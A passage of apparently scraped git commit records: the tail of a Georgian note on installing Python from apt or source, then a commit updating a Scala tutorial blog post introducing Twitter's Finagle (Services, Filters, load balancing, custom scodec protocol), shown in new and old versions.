apt-get, yum, pacman \u10d3\u10d0 \u10d0.\u10e8.\n\ndebian\/ubuntu \u10d3\u10d8\u10e1\u10e2\u10e0\u10d8\u10d1\u10e3\u10e2\u10d8\u10d5\u10d4\u10d1\u10d6\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d2\u10d0\u10d5\u10e3\u10e8\u10d5\u10d0\u10d7 \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d0\n\u10db\u10d0\u10d2. \u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 2.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python2.7\n\n\u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 3.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python3.3\n \n\n\u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0 \u10e1\u10dd\u10e0\u10e1\u10d8\u10d3\u10d0\u10dc, \u10e1\u10dd\u10e0\u10e1\u10d8\u10e1 \u10d2\u10d0\u10d3\u10db\u10dd\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10d2\u10d8\u10eb\u10da\u10d8\u10d0\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d8\u10d3\u10d0\u10dc \u10d0\u10dc Ftp \u10d3\u10d0\u10dc - https:\/\/www.python.org\/ftp\/python\/ [Python Source Code] \u10d5\u10d8\u10e0\u10e9\u10d4\u10d5\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0\u10e1 3.5.1 \u10d3\u10d0 \u10d5\u10d8\u10ec\u10d4\u10e0\u10d7 *.tgz \u10e4\u10dd\u10e0\u10db\u10d0\u10e2\u10d8\u10e1 \u10e4\u10d0\u10d8\u10da\u10e1 Python-3.5.1.tgz \u10e8\u10d4\u10db\u10d3\u10d4\u10d2 \u10d5\u10ee\u10e1\u10dc\u10d8\u10d7 \u10e2\u10d4\u10e0\u10db\u10d8\u10dc\u10d0\u10da\u10e1 \u10d3\u10d0 \u10d5\u10e3\u10e8\u10d5\u10d4\u10d1\u10d7 \u10e5\u10d5\u10d4\u10db\u10dd\u10d7 \u10db\u10dd\u10ea\u10d4\u10db\u10e3\u10da \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n \n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d8\u10e1 \u10de\u10e0\u10dd\u10ea\u10d4\u10e1\u10d8 \u10ec\u10d0\u10e0\u10db\u10d0\u10e2\u10d4\u10d1\u10d8\u10d7 \u10d3\u10d0\u10e1\u10e0\u10e3\u10da\u10d3\u10d0.\n\n\n:hp-tags: title[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],title[\u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d8]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cce5bccb347a81a04678862d144e3eedcd6474a4","subject":"Update 2016-11-28-An-Introduction-to-Finagle-by-example.adoc","message":"Update 2016-11-28-An-Introduction-to-Finagle-by-example.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-28-An-Introduction-to-Finagle-by-example.adoc","new_file":"_posts\/2016-11-28-An-Introduction-to-Finagle-by-example.adoc","new_contents":"= An Introduction to Finagle by example\n<vgrente@gmail.com>\n:hp-image: \/covers\/cover.png\n:published_at: 2016-11-28\n:hp-tags: Finagle\n\nIt is a challenging task to build a large-scale web application, there are fundamental characteristics to take into account: for example, efficiency, safety and robustness. Finagle is a asynchronous, Netty based JVM RPC system made by Twitter which makes it easy to build high available clients and servers in Java and Scala. And it can even simplify your application architecture. 
Here I want to show you how powerful Finagle is.\n\n== Quickstart\nLet's first have a quick look at how to create a Finagle micro web service and a Finagle HTTP client to consume this API. Create an sbt project and import the dependencies.\n[source,scala]\n----\nlibraryDependencies ++= Seq(\n  \"com.twitter\" %% \"finagle-http\" % \"6.38.0\",\n  \"org.scalatest\" %% \"scalatest\" % \"2.2.4\" % \"test\"\n)\n----\nFirst, let's define a service. Here we define a service that receives an HTTP request, reads its URL parameter as an Integer, and returns an HTTP response with 10 added.\n[source,scala]\n----\nimport com.twitter.finagle.Service\nimport com.twitter.util.Future\nimport com.twitter.finagle.http\n\n\/\/ This is a plus-10 service\nclass PlusTenService extends Service[http.Request, http.Response] {\n\n  override def apply(request: http.Request): Future[http.Response] = {\n    Future {\n      val input = request.getIntParam(\"num\")\n      val output = input + 10\n      val response = http.Response(request.version, http.Status.Ok)\n      response.setContentString(output.toString)\n      response\n    }\n  }\n}\n----\nThen initiate and start our server.\n[source,scala]\n----\nimport com.twitter.finagle.{http, Service, Http}\nimport com.twitter.util.Await\n\nobject QuickLookServer {\n  def main(args: Array[String]): Unit = {\n    val service: Service[http.Request, http.Response] = new PlusTenService\n    val server = Http.serve(\":9090\", service)\n    Await.ready(server)\n  }\n}\n----\nLast, let's define a client to consume this server.\n[source,scala]\n----\nimport com.twitter.finagle.{Service, Http}\nimport com.twitter.finagle.http\nimport com.twitter.util.Await\n\nobject QuickLookClient {\n  def main(args: Array[String]): Unit = {\n    \/\/ define a client\n    val client: Service[http.Request, http.Response] = Http.newService(\"localhost:9090\")\n    \/\/ define a request\n    val request = http.Request(http.Method.Get, \"\/?num=5\")\n    \/\/ apply the request on the client\n    val response = client(request)\n    \/\/ print the response\n    response.foreach(rep => println(rep.getContentString()))\n    Await.result(response)\n  }\n}\n----\nIf you run the two applications, you will see the server running on localhost:9090 and the client getting the response 15. Simple, right? As you can see, our service and client are both of type Service[http.Request, http.Response] . This data type really confused me in the beginning; I will explain the differences between them. \n\n== The core of Finagle\nService\n\nNow let's first have a look at the core of Finagle, Service[-Req, +Rep] . You can find the definition in com.twitter.finagle.Service . In Finagle 6.38.0 the definition of Service is an abstract class; in previous versions it was a trait.\n[source,scala]\n----\nabstract class Service[-Req, +Rep] extends (Req => Future[Rep])\n----\nA service is a function that takes a request of type Req and returns a response of type Future[Rep]. This Service type is used to represent both clients and servers. To answer my previous question, the difference between a service and a client is that a Finagle client \u201cimports\u201d a Service from the network, whereas a Finagle server \u201cexports\u201d a Service to the network. Note: the Future here is a Twitter Future, not a Scala Future; conceptually they are the same. 
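\nTo make the \u201cservice is just a function\u201d idea concrete, here is a minimal sketch using the Service.mk helper from finagle-core (the service name and types here are illustrative, not part of the original examples):\n[source,scala]\n----\nimport com.twitter.finagle.Service\nimport com.twitter.util.Future\n\n\/\/ Service.mk lifts a plain Req => Future[Rep] function into a Service.\nval echoLength: Service[String, Int] =\n  Service.mk[String, Int] { s => Future.value(s.length) }\n\n\/\/ Applying the service is an ordinary function call.\nval result: Future[Int] = echoLength(\"finagle\")\n----\n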
Filter\n\nSometimes we want to add application-agnostic behaviour; we can use a Filter to achieve this.\n[source,scala]\n----\nabstract class Filter[-ReqIn, +RepOut, +ReqOut, -RepIn]\n  extends ((ReqIn, Service[ReqOut, RepIn]) => Future[RepOut])\n----\n\nIn most common cases, ReqIn is equal to ReqOut, and RepIn is equal to RepOut. So we have this SimpleFilter class:\n\n[source,scala]\n----\nabstract class SimpleFilter[Req, Rep] extends Filter[Req, Rep, Req, Rep]\n----\nA filter can be attached to the client side and the server side. Let's try to implement a simple timeout filter.\n[source,scala]\n----\nimport com.twitter.finagle.{SimpleFilter, Service}\nimport com.twitter.util.{Duration, Timer, Future}\n\nclass TimeoutFilter[Req, Rep](timeout: Duration, timer: Timer)\n  extends SimpleFilter[Req, Rep] {\n\n  def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = {\n    val res = service(request)\n    res.within(timer, timeout)\n  }\n}\n----\nHere, the timeout filter is a class extending SimpleFilter. Below is how to use this filter on the client side:\n[source,scala]\n----\nval quickLookClient = Http.newService(\"localhost:9090\")\n\nval timeoutFilter = new TimeoutFilter[http.Request, http.Response](\n  Duration.fromSeconds(1), new JavaTimer(false))\n\nval clientWithTimeoutFilter = timeoutFilter.andThen(quickLookClient)\n----\n\nA filter can be applied on the server side too. Here is an example. First let's define a filter.\n\n[source,scala]\n----\nclass CountFilter[Req, Rep](countClient: Service[http.Request, http.Response])\n  extends SimpleFilter[Req, Rep] {\n\n  override def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = {\n    val countRequest = http.Request(http.Method.Post, \"\/?count=5\")\n    countClient(countRequest)\n    service(request)\n  }\n}\n----\nAnd then let's use it on our plus-10 service:\n[source,scala]\n----\nval service: Service[http.Request, http.Response] = new PlusTenService\n\nval countClient = Http.newService(\"localhost:9010\")\n\nval countFilter = new CountFilter[http.Request, http.Response](countClient)\n\nval serviceWithCountFilter = countFilter.andThen(service)\n----\nYou may notice that the way to chain a filter and a service together is the andThen method. The andThen method can not only chain a filter with a service but also chain multiple filters, like filter1 andThen filter2 andThen myService, as sketched below. 
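\nAs a small sketch of that multi-filter chaining, reusing the TimeoutFilter and CountFilter defined above (only the composed value's name is new here):\n[source,scala]\n----\n\/\/ Requests flow through the timeout filter, then the count filter,\n\/\/ and finally reach the service itself.\nval guarded: Service[http.Request, http.Response] =\n  timeoutFilter.andThen(countFilter).andThen(service)\n----\n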
\n== Client\nThis is the part that I like the most in Finagle. The Finagle HTTP client is designed to maximize success and minimize latency. Each request will flow through various modules. These modules are logically separated into three stacks: the Client stack, the Endpoint stack, and the Connection stack.\n\n*Client stack*\n\nmanages name resolution and balances requests across multiple endpoints.\n\n*Endpoint stack*\n\nprovides circuit breakers and connection pooling.\n\n*Connection stack*\n\nprovides connection life-cycle management and implements the wire protocol.\n\nUsing the Finagle HTTP client is very simple. Define a client first, define an HTTP request, then apply the request on the client.\n\n[source,scala]\n----\n\/\/ create a http client\nval client = Http.client.newService(\"example.com:80\")\n\/\/ create a http request\nval req = Request(\"\/foo\", (\"my-query-string\", \"bar\"))\n\/\/ apply the request on the client\nval resp: Future[Response] = client(req)\n----\nNote: client(req) is equal to client.apply(req) .\n\nWhat I want to emphasize here is the load balancer module. This module brings a lot of benefit for your application; it can simplify your application infrastructure. Let's compare it with the traditional solution.\n\nIn the traditional solution, you rely heavily on nginx as a load balancer; once nginx dies, your service is not reachable. In a real production environment you run master-slave nginx with keepalived installed on the nginx machines for heartbeat detection. This looks really complex - what if we could get rid of these nginx instances? Let's have a look at the following code.\n[source,scala]\n----\nval name: Name =\n  Name.bound(\n    Address(\"localhost\", 10010),\n    Address(\"localhost\", 10011),\n    Address(\"localhost\", 10012))\n\n\/\/ define a client\nval client: Service[http.Request, http.Response] = Http.newService(name, \"client\")\n----\nThis means you supply three addresses and put them into the Finagle HTTP client. The Finagle client will dispatch each request to one of the addresses based on a load-balancing algorithm. The default algorithm is \"Exponentially Weighted Moving Average (EWMA)\". Now your infrastructure becomes much simpler: your APIs talk to each other directly.\n\n== Protocol-agnostic\n\nFinagle is a protocol-agnostic RPC system, which means Finagle supports every protocol as long as someone implements it. For example, finagle-thrift uses the thrift protocol, and finagle-mysql implements the mysql protocol. Now, let's look at this scenario: we want to make an API count service that counts how many times the web service has been called. In the Service and Filter sections, we sent an HTTP request and put the number as a query parameter. It just feels strange that when I only want to send a number to the count server, I have to send a whole HTTP request - I don't use any data from the header, cookies, or body. If the application is running on AWS, that junk information costs money. So it's ideal to just send an integer number to the API count service. Let's implement this by customizing the Finagle protocol. 
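\nBefore wiring anything into Netty, it may help to see the scodec round trip on its own; a minimal sketch that mirrors the Codec.encodeValid and Codec.decodeValidValue calls used below (the implicit codec matches the uint8 codec the server and client use later):\n[source,scala]\n----\nimport scodec.Codec\nimport scodec.bits.BitVector\n\nimplicit val integerCodec = scodec.codecs.uint8\n\n\/\/ Encode 42 into bits, then decode it back to an Int.\nval bits: BitVector = Codec.encodeValid(42)\nval back: Int = Codec.decodeValidValue[Int](bits)\n----\n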
What I want to emphasize here is the load balancer module. This module brings a lot of benefit to your application and can simplify your application infrastructure. Let's compare it with the traditional solution.\n\nimage\n\nAs you can see, the traditional solution relies heavily on nginx as a load balancer: once nginx dies, your service is not reachable. In a real production environment you would run master-slave nginx with keepalived installed on the nginx machines for heartbeat detection. This looks really complex. What if we could get rid of these nginx instances? Let's have a look at the following code.\n[source,scala]\n----\nval name: Name = Name.bound(\n  Address(\"localhost\", 10010),\n  Address(\"localhost\", 10011),\n  Address(\"localhost\", 10012))\n\n\/\/ define a client\nval client: Service[http.Request, http.Response] = Http.newService(name, \"client\")\n----\nThis means you supply three addresses to the Finagle HTTP client. The Finagle client will dispatch each request to one of the addresses based on a load balancing algorithm. The default algorithm is \"Exponentially Weighted Moving Average (EWMA)\". Now your infrastructure architecture becomes the following:\n\nimage\n\nPretty simple, right? Your APIs talk to each other directly.\n\n== Protocol-agnostic\n\nFinagle is a protocol-agnostic RPC system: it can support any protocol for which a codec has been implemented. For example, finagle-thrift implements the thrift protocol and finagle-mysql implements the mysql protocol. Now, let's look at this scenario.\n\nimage\n\nWe want to build an API count service that counts how many times the web service has been called. In the Service and Filter sections we sent an HTTP request with the number as a query parameter. It feels strange that, just to send a number to the count server, I have to send a whole HTTP request, because I don't use any data from the headers, cookies or body. If the application is running on AWS, that junk information costs money. So it would be ideal to send just an integer to the API count service. Let's implement this by customizing the Finagle protocol. First, we should tell Finagle how to convert an scodec codec into a Netty encoder and decoder.\n\n[source,scala]\n----\nimport org.jboss.netty.buffer.{ChannelBuffer, ChannelBuffers}\nimport org.jboss.netty.channel.{Channel, ChannelHandlerContext}\nimport org.jboss.netty.handler.codec.oneone.{OneToOneDecoder, OneToOneEncoder}\nimport scodec.Codec\nimport scodec.bits.BitVector\n\ntrait CodecConversions {\n  \/** Converts an scodec codec into a Netty encoder. *\/\n  protected def encoder[A: Codec] = new OneToOneEncoder {\n    override def encode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) =\n      ChannelBuffers.wrappedBuffer(\n        Codec.encodeValid(msg.asInstanceOf[A]).toByteBuffer)\n  }\n\n  \/** Converts an scodec codec into a Netty decoder. *\/\n  protected def decoder[A: Codec] = new OneToOneDecoder {\n    override def decode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) =\n      msg match {\n        case cb: ChannelBuffer =>\n          Codec.decodeValidValue[A](BitVector(cb.toByteBuffer)).asInstanceOf[Object]\n        case other => other\n      }\n  }\n}\n----\nAnd then the channel pipeline and codec factories:\n[source,scala]\n----\ntrait Factories { this: CodecConversions =>\n  import com.twitter.finagle.{Codec => FinagleCodec, CodecFactory}\n  import org.jboss.netty.channel.{ChannelPipelineFactory, Channels}\n\n  \/** Creates a Netty channel pipeline factory given input and output types. *\/\n  private[this] def pipeline[I: Codec, O: Codec] = new ChannelPipelineFactory {\n    def getPipeline = {\n      val pipeline = Channels.pipeline()\n      pipeline.addLast(\"encoder\", encoder[I])\n      pipeline.addLast(\"decoder\", decoder[O])\n      pipeline\n    }\n  }\n\n  \/** Creates a Finagle codec factory given input and output types. *\/\n  protected def codecFactory[I: Codec, O: Codec] = new CodecFactory[I, O] {\n    def server = Function.const {\n      new FinagleCodec[I, O] { def pipelineFactory = pipeline[O, I] }\n    }\n    def client = Function.const {\n      new FinagleCodec[I, O] { def pipelineFactory = pipeline[I, O] }\n    }\n  }\n}\n----\n\nAnd then the code that actually creates our Finagle server and client:\n\n[source,scala]\n----\nimport java.net.InetSocketAddress\n\nimport com.twitter.conversions.time._\nimport com.twitter.finagle.Service\nimport com.twitter.finagle.builder.{ClientBuilder, ServerBuilder}\nimport com.twitter.util.{Duration, Future}\nimport scodec.Codec\n\nobject IntegerServerAndClient extends Factories with CodecConversions {\n\n  \/** Creates a Finagle server from a service for which we have scodec codecs\n    * for both the input and output types. *\/\n  def server[I, O](port: Int)(service: Service[I, O])(implicit ic: Codec[I], oc: Codec[O]) =\n    ServerBuilder()\n      .name(\"server\")\n      .codec(codecFactory[I, O])\n      .bindTo(new InetSocketAddress(port))\n      .build(service)\n\n  \/** Creates a Finagle client given input and output types with scodec codecs. *\/\n  def client[I, O](host: String, timeout: Duration = 3.second)(implicit ic: Codec[I], oc: Codec[O]) =\n    ClientBuilder()\n      .name(\"client\")\n      .codec(codecFactory[I, O])\n      .hosts(host)\n      .timeout(timeout)\n      .build()\n}\n----\n\nDefine our simple service:\n[source,scala]\n----\nimport com.twitter.finagle.Service\nimport com.twitter.util.Future\n\nclass IntegerService extends Service[Int, Int] {\n  \/\/ NOTE: count is never updated here; a real count service would\n  \/\/ accumulate it on every call.\n  var count = 0\n  override def apply(request: Int): Future[Int] = {\n    Future.value(count + request)\n  }\n}\n----\n\nRun a server:\n\n[source,scala]\n----\nimport com.twitter.finagle.Service\nimport com.twitter.util.Await\nimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Server {\n  def main(args: Array[String]): Unit = {\n    implicit val integerCodec = scodec.codecs.uint8\n\n    val service: Service[Int, Int] = new IntegerService\n    val server = IntegerServerAndClient.server[Int, Int](9191)(service)\n    Await.ready(server)\n  }\n}\n----\nRun a client:\n[source,scala]\n----\nimport com.twitter.finagle.Service\nimport com.twitter.util.Await\nimport scodec.codecs.implicits.{ implicitIntCodec => _, _ }\n\nobject Client {\n  def main(args: Array[String]): Unit = {\n\n    implicit val integerCodec = scodec.codecs.uint8\n\n    \/\/ define a client\n    val client: Service[Int, Int] = IntegerServerAndClient.client[Int, Int](\"localhost:9191\")\n    \/\/ define a request\n    val request = 4\n    \/\/ apply request on the client\n    val response = client(request)\n    \/\/ print response\n    response.foreach(rep => println(s\"This is response $rep\"))\n    Await.result(response)\n  }\n}\n----\n
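Because the custom client is just a Service[Int, Int], the filter machinery from the Service and Filter sections applies unchanged. A minimal sketch, reusing the TimeoutFilter defined earlier; the names intClient and intClientWithTimeout are illustrative, and the uint8 codec is assumed to be in implicit scope as in the Client object above:\n[source,scala]\n----\nimport com.twitter.finagle.Service\nimport com.twitter.util.{Duration, JavaTimer}\n\n\/\/ The client built by IntegerServerAndClient is a plain Service[Int, Int],\n\/\/ so the protocol-agnostic TimeoutFilter wraps it like any other service.\nval intClient: Service[Int, Int] =\n  IntegerServerAndClient.client[Int, Int](\"localhost:9191\")\n\nval intClientWithTimeout: Service[Int, Int] =\n  new TimeoutFilter[Int, Int](Duration.fromSeconds(1), new JavaTimer(false))\n    .andThen(intClient)\n----\n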
== Conclusion\nFinagle is a very flexible asynchronous, protocol-agnostic RPC framework. It can help you build high performance microservices with any protocol. It is also worth taking a look at Finch, a web framework built on top of Finagle. You can find a more detailed introduction on the https:\/\/blog.twitter.com\/2011\/finagle-a-protocol-agnostic-rpc-system[Twitter blog] and more detailed examples in the http:\/\/twitter.github.io\/scala_school\/searchbird.html[Twitter scala school].\n\n\n\n\n\n\n\n\n\n\n","old_contents":"= An Introduction to Finagle by example\n(Yue;Li)\n:hp-image: \/covers\/cover.png\n:published_at: 2016-11-28\n:hp-tags: Finagle\n\nIt is a challenging task to build a large-scale web application, there are fundamental characteristics to take into account: for example, efficiency, safety and robustness. Finagle is a asynchronous, Netty based JVM RPC system made by Twitter which makes it easy to build high available clients and servers in Java and Scala. And it can even simplify your application architecture. Here I want to show you how powerful Finagle is.\n\n== Quickstart\nLet's first have a quick look about how to create a Finagle micro web service and a Finagle http client to consume this api.Create a sbt project and import dependencies.\n[source,scala]\n----\nlibraryDependencies ++= Seq( \n\"com.twitter\" %% \"finagle-http\" % \"6.38.0\", \n\"org.scalatest\" %% \"scalatest\" % \"2.2.4\" % \"test\"\n)\n----\nFirst, let's define a service. Here we define a service to receive a http request and get its url parameter as Integer then return a http response by plus 10.\n[source,scala]\n----\nimport com.twitter.finagle.Serviceimport com.twitter.util.Futureimport com.twitter.finagle.http\n\nThis is a plus 10 serviceclass PlusTenService extends Service[http.Request, http.Response] {\n\n\n override def apply(request: http.Request): Future[http.Response] = { \n Future { \n val input = request.getIntParam(\"num\") \n val output = input + 10 \n val response = http.Response(request.version, http.Status.Ok) response.setContentString(output.toString) \n response } }\n}\n----\nThen initiate and start our server\n[source,scala]\n----\nimport com.twitter.finagle.{http, Service, Http}import com.twitter.util.Await\n\nobject QuickLookServer { def main(args: Array[String]): Unit = { val service: Service[http.Request, http.Response] = new PlusTenService val server = Http.serve(\":9090\", service) Await.ready(server) }}\n----\nLast let's define a client to consume this server.\n[source,scala]\n----\nimport com.twitter.finagle.{Service, Http}import com.twitter.finagle.httpimport com.twitter.util.Await\n\nobject QuickLookClient { def main(args: Array[String]): Unit = { \/\/define a client val client: Service[http.Request, http.Response] = Http.newService(\"localhost:9090\") \n\/\/define a request \nval request = http.Request(http.Method.Get, \"\/?num=5\") \n\/\/apply request on the client \nval response = client(request) \n\/\/print response \nresponse.foreach(rep => println(rep.getContentString()))\nAwait.result(response) }\n}\n----\nIf you run the two application you will see the server running on localhost:9090 and client get response 15. Simple right? As you can see our service and client are both type of Service[http.Request, http.Response] . This data type really confuse me in the beginning. I will explan what's the differences between them. \n\n== The core of Finagle\nService\n\nNow let's first have a look at the core of finagle Service[-Req, +Rep] . You can find the definition in com.twitter.finagle.Service . 
In Finagle 6.38.0 the definition of Service is an abstract class, in previous version it was a trait\n[source,scala]\n----\nabstract class Service[-Req, +Rep] extends (Req => Future[Rep])\n----\nA service is a function that takes request of type Req, and return a response of Future of Rep. This Services type are used to represent both clients and servers. To answer my previous question, the differences between service and client is that a Finagle client \u201cimports\u201d a Service from the network. However, a Finagle server \u201cexports\u201d a Service to the network.Note: the Future here is twitter future not scala future. There is no differences on conception.\n\nFilter\n\nSome times we want to add application-agnostic behaviour, we can use Filter to achieve this.\n[source,scala]\n----\nabstract class Filter[-ReqIn, +RepOut, +ReqOut, -RepIn] \nextends ((ReqIn, Service[ReqOut, RepIn]) \n=> Future[RepOut])\n----\n\nimage\n\nIf it is not clear please check image below.\n\nimage\n\nIn most common cases, ReqIn is equal to ReqOut, and RepIn is equal to RepOut. So we have this SimpleFilter class\n\n[source,scala]\n----\nabstract class SimpleFilter[Req, Rep] extends Filter[Req, Rep, Req, Rep]\n----\nA filter can attached to client and server side. Let's try to implement a simple timeout filter.\n[source,scala]\n----\nimport com.twitter.finagle.{SimpleFilter, Service}import com.twitter.util.{Duration, Timer, Future}\n\nclass TimeoutFilter[Req, Rep](timeout: Duration, timer: Timer)\nextends SimpleFilter[Req, Rep] {\n\n def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = { \n val res = service(request) \n res.within(timer, timeout) }\n }\n----\nHere, a timeout filter is a class extends SimpleFilter trait. Below is how to use this filter on client side\n[source,scala]\n----\nclient = Http.newService(\"localhost:9090\")\n\nval timeoutFilter = new TimeoutFilter[http.Request, http.Response](Duration.fromSeconds(1),\nnew JavaTimer(false))\n\nval clientWithTimeoutFilter = timeoutFilter.andThen(quickLookClient)\n----\n\nA filter can be applied on server side too. Here is an example. First let's define a filter.\n\n[source,scala]\n----\nclass CountFilter[Req, Rep](countClient: Service[http.Request, http.Response])\nextends SimpleFilter[Req, Rep]\n{ override def apply(request: Req, service: Service[Req, Rep]): Future[Rep] = \n{ val countRequest = http.Request(http.Method.Post, \"\/?count=5\") countClient(countRequest) service(request) }}\n----\nAnd then let's use it on our plusTen service\n[source,scala]\n----\nal service: Service[http.Request, http.Response] = new PlusTenService\n\nval countClient = Http.newService(\"localhost:9010\")\n\nval countFilter = new CountFilter[http.Request, http.Response](countClient)\n\nval serviceWithCountFilter = countFilter.andThen(service)\n----\nYou may notice the way to chain filter and service together is by using andThen method. Actually andThen method can not only chain filter with service but also chain multiple filters, like filter1 andThen filter2 andThen myservice \n\n## Client\nThis is the part that I like the most in finagle. Finagle http client is designed to maximize success and minimize latency. Each request will flow through various modules. 
These modules are logically separated into three stacks: Client stack, Endpoint stack, connection stack.\n\n*Client stack*\n\nmanages name resolution and balances requests across multiple endpoints.\n\n*Endpoint stack*\n\nprovides circuit breakers and connection pooling.\n\n*connection stack*\n\nprovides connection life-cycle management and implements the wire protocol.\n\nTo use finagle http client is very simple. Define a client first and define a http request, then apply request on the client.\n\n[source,scala]\n----\n\/\/ create a http clientval client = \nHttp.client.newService(\"example.com:80\")\n\/\/ create a http requestval req =\nRequest(\"\/foo\", (\"my-query-string\", \"bar\")\n)\n\/\/ apply request on the clientval resp: Future[Response] = client(req)Note: client(req) is equal to client.apply(req) \n----\nWhat I want to emphasis here is the Load Balancer module. This module brings a lot of benefit for your application. It can simplify your application infstracture. Let's compare it with traditional solution.\n\nimage\n\nAs you can see, the traditional solution highly rely on nginx as load balancer, once nginx dead your service is not reachable, in real production environment, you have master-slave nginx wiht keeplived installed on nginx machine for heartbeat detection. This looks really complex, what about if we can get rid of these nginx?Let's have look at following code.\n[source,scala]\n----\nname: Name =\nName.bound(Address(\"localhost\", 10010), Address(\"localhost\", 10011), Address(\"localhost\", 10012)\n)\n\/\/define a clientval client: Service[http.Request, http.Response] = Http.newService(name, \"client\")\n----\nThis means you supply three addresses and put it into finagle http client. Finagle client will dispatch the request to one of address based on certain load balance algorithmn. The default algorithmn is \"Exponentially Weighted Moving Average (EWMA)\". Now your infstracture architechture becomes like following\n\nimage\n\nPretty simple right. Your apis talk to each other directly.\n\n## Protocol-agnostic\n\nFinagle is a protocol-agnostic RPC system. It means Finagle supports every protocol if people implement it. For example: finagle-thrift is using thrift protocol. finagle-mysql implements the mysql protocol.Now, let's look at this scenario \n\nimage\n\nWe want to make a api count service to count how many times the web service has been called. In section Service and Filter. We send http request and put number as query parameter. It just feel strange that I just want to send a number to count server, to achieve that I have to send a http request. Because I don't use any data from header, cookie and body. If the application is running on AWS, it those junk information cost money. So it's ideal to just send a integer number to api count service. Let's implement this by customize finagle protocol.First, we should tell finagle how to converts an scodec codec into a Netty encoder\n\n[source,scala]\n----\nimport org.jboss.netty.buffer.{ChannelBuffer, ChannelBuffers}import org.jboss.netty.channel.{Channel, ChannelHandlerContext}import org.jboss.netty.handler.codec.oneone.{OneToOneDecoder, OneToOneEncoder}import scodec.Codecimport scodec.bits.BitVector\n\ntrait CodecConversions { \/** * Converts an scodec codec into a Netty encoder. 
*\/ protected def encoder[A: Codec] =\nnew OneToOneEncoder {\noverride def encode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) = \n\nChannelBuffers.wrappedBuffer( Codec.encodeValid(msg.asInstanceOf[A]).toByteBuffer ) \n}\n\n \/** * Converts an scodec codec into a Netty decoder. \n *\/ protected def decoder[A: Codec] = new OneToOneDecoder { \n override def decode(ctx: ChannelHandlerContext, channel: Channel, msg: Object) = \n msg match { \n case cb: ChannelBuffer => Codec.decodeValidValue[A](BitVector(cb.toByteBuffer)).asInstanceOf[Object] case other => other } \n }\n } \n----\nAnd then channel pipeline and codec factories\n[source,scala]\n----\ntrait Factories { this: CodecConversions => import com.twitter.finagle.{Codec => FinagleCodec, CodecFactory} import org.jboss.netty.channel.{ChannelPipelineFactory, Channels}\n\n \/** * Creates a Netty channel pipeline factory given input and output types. *\/ private[this] def pipeline[I: Codec, O: Codec] = new ChannelPipelineFactory { def getPipeline = { val pipeline = Channels.pipeline() pipeline.addLast(\"encoder\", encoder[I]) pipeline.addLast(\"decoder\", decoder[O]) \n pipeline } \n }\n \/** * Creates a Finagle codec factory given input and output types. *\/ protected def codecFactory[I: Codec, O: Codec] = new CodecFactory[I, O] { \n def server = Function.const { \n new FinagleCodec[I, O] { def pipelineFactory = pipeline[O, I] } \n }\n def client = Function.const { \n new FinagleCodec[I, O] { def pipelineFactory = pipeline[I, O] } \n } \n }\n }\n----\n\n\nAnd then the code that actually creates our Finagle server and client\n\n[source,scala]\n----\nimport java.net.InetSocketAddress\n\nimport com.twitter.conversions.time._import com.twitter.finagle.Serviceimport com.twitter.finagle.builder.{ClientBuilder, ServerBuilder}import com.twitter.util.{Duration, Future}import scodec.Codec\n\nobject IntegerServerAndClient extends Factories with CodecConversions {\n\n \/** * Creates a Finagle server from a service that we have scodec codecs * for both the input and output types. *\/ def server[I, O](port: Int)(service: Service[I, O])(implicit ic: Codec[I], oc: Codec[O]) = ServerBuilder() \n .name(\"server\") \n .codec(codecFactory[I, O]) \n .bindTo(new InetSocketAddress(port)) .build(service)\n \n \/** * Creates a Finagle client given input and output types with scodec codecs. 
